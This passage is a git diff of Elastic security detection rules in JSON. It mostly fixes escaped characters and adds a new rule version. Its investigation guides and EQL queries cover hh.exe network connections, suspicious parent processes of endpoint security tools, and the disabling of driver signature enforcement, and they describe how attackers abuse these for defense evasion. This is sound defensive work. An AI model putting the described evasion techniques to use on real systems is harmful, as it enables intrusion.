"references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_105.json b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_105.json index c0c7de418d6..e83b460830c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"hh.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"hh.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_101.json b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_101.json index ecc51d23622..b545edc84f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_101.json +++ b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_101.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_102.json b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_102.json index 9f74e30fd83..13f58349e7d 100644 --- a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_102.json @@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_103.json b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_103.json index 7e360daecb6..9dbe5d94a1b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b347b919-665f-4aac-b9e8-68369bf2340c_103.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_104.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_104.json index 2c8370e7365..0812dc33a35 100644 --- a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_105.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_105.json index e9ca871699b..63e8e999d19 100644 --- a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_106.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_106.json index 006be6a6576..85d93fbb80e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_106.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_107.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_107.json index 1c3f76946d6..685ae416cb6 100644 --- a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_107.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_108.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_108.json index ce3d72a3d02..a1184f55a46 100644 --- a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_108.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_109.json b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_109.json new file mode 100644 index 00000000000..e561d9ba915 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b41a13c6-ba45-4bab-a534-df53d0cfed6a_109.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Endpoint Security Parent Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"esensor.exe\", \"elastic-endpoint.exe\") and\n process.parent.executable != null and\n /* add FPs here */\n not process.parent.executable : (\n \"?:\\\\Program Files\\\\Elastic\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Windows\\\\explorer.exe\"\n ) and\n not (\n process.parent.executable : (\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\System32\\\\SecurityHealthHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n ) and\n process.args : (\n \"test\", \"version\",\n \"top\", \"run\",\n \"*help\", \"status\",\n \"upgrade\", \"/launch\",\n \"/enable\"\n )\n )\n \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_2.json b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_2.json index f8ccc1b4208..3a82a5f0f28 100644 --- a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_2.json +++ b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_2.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_3.json b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_3.json index d1daa6d6354..27cdb0c85db 100644 --- a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_3.json +++ b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_3.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Built-in tools", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further 